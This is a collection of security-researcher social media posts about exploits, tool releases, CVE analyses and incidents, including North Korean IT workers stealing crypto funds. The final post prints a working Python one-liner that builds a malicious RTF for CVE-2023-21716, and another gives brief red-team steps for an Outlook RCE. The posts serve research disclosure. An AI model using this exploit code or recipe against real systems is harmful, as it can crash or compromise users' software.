I wrote a proof of concept for the so-called LNK zero day. I think it’s just a feature rather than vulnerability. But who knows :-)
https://t.co/AmhfKgSclz
TM started to hijack request over DoH (DNS over HTTPS), DoT (DNS over TLS), and hijack response. Malaysia great firewall! Have to option in for less common public DNS or use private DNS with unique personal url.
1/ Recently a team reached out to me for assistance after $1.3M was stolen from the treasury after malicious code had been pushed.
Unbeknownst to the team they had hired multiple DPRK IT workers as devs who were using fake identities.
I then uncovered 25+ crypto projects with related devs that have been active since June 2024.
Dropped a new tool at DEF CON 32! Loot SCCM Distribution points via HTTP with https://t.co/3Stfi3v2Wf
We've found credentials, certificates, custom apps, keystores, etc. What will you find?
[RELEASE] Following the talk at DEF CON, I'm releasing all the POC projects associated with DriverJack. More info in the repos. For any additional info, hit me up ;)
- https://t.co/VmVpVtNkhD
- https://t.co/Cdzi5RBgVE
- https://t.co/RjN05qKeXg
Progress just un-embargoed a very closely guarded auth bypass in MOVEit Transfer's SFTP mechanism - CVE-2024-5806.
We were lucky enough to receive a tip-off :-) Enjoy our analysis, we had a lot of fun.
https://t.co/GLoCIAki9w
This is the PS Hanami, my handmade Playstation 1 portable that I designed and built in one month! It uses a REAL PS1 motherboard that I cut in half, folded like a book, and rewired. NO emulation! Details in🧵
https://t.co/WF8F8KgAiw
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!
A brief instruction for red teams:
1. Compile our enhanced DLL 👉 https://t.co/cQWF8KM8vL
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
One of our pentesters recently got a new D-Link DAP-X1860 repeater, which they couldn't setup.
This was caused by a neighbor's Wi-Fi containing a single tick in their Wi-Fi name ("Olaf's WiFi"), resulting in the following error while scanning for access points:
Revisiting an old vulnerability in AV that I’ve found and reported. The entire interface and some mechanisms are change but some bug(s) are still there 🤷
Get ready for an exciting new chapter in Wargames Malaysia! With our expertise in both cybersecurity and chocolate making, we're thrilled to announce our latest venture, Chocolate-The-Flag! Stay tuned for the pre-order form! #chocolatetheflag#cybersecuritymeetschocolate
We've just published a quick write up on CVE-2023-23397, which allows a remote adversary to leak NetNTLMv2 hashes: https://t.co/xDxGwJfY2e by @domchell
CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))